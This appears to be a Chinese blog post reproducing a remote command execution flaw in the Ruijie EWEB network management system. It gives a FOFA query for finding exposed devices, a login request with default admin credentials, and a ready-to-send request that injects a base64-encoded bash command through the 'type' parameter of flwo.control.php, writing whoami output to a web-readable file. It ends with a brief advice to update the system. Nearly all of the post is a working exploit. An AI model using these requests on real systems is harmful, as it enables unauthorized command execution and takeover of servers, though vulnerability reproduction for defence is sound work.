锐捷EWEB网管系统 RCE漏洞复现

0x01 产品简介

锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

0x02 漏洞概述

Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="Ruijie-EWEB网管系统"

0x04 漏洞复现

获取admin用户有效cookie

复制代码
POST /ddi/server/login.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=admin&password=admin?

携带cookie执行命令并将结果写进txt文件, 命令需要base64编码

复制代码
POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Cookie: your-cookie user=admin;
Accept-Encoding: gzip
Connection: close

type=%7Cbash+-c+%27echo+cm0gLXJmIC4uL2EudHh0ICYmIHJtIC1yZiAuLi9hLnR4dCAmJiB3aG9hbWkgPiAuLi9hLnR4dCAyPiYxID4gLi4vYS50eHQgMj4mMQ%3D%3D+%7C+base64+-d+%7C+bash+%26%26+exit+0%27

验证

复制代码
GET /a.txt HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

0x05 修复建议

请及时关注厂商官网,并更新最新系统:https://www.ruijie.com.cn/

相关推荐
云卓SKYDROID16 分钟前
无人机激光测距技术应用与挑战
网络·无人机·吊舱·高科技·云卓科技
zskj_zhyl3 小时前
家庭健康能量站:微高压氧舱结合艾灸机器人,智享双重养生SPA
人工智能·科技·安全·机器人
肥仔哥哥19303 小时前
安全设计-防止非法移机
安全·非法移机·自助机的安全设计·设备的安全设计
iナナ6 小时前
传输层协议——UDP和TCP
网络·网络协议·tcp/ip·udp
网络安全创新研究院6 小时前
飞网揭秘:个人网络与团队网络功能对比
安全
华强笔记7 小时前
Linux内存管理系统性总结
linux·运维·网络
Warren988 小时前
软件测试-Selenium学习笔记
java·javascript·笔记·学习·selenium·测试工具·安全
字节跳动安全中心8 小时前
智能体防御 | 一文了解3种系统提示词加固方法
安全·llm
iY_n9 小时前
Linux网络基础
linux·网络·arm开发
EggrollOrz9 小时前
网络编程day3
网络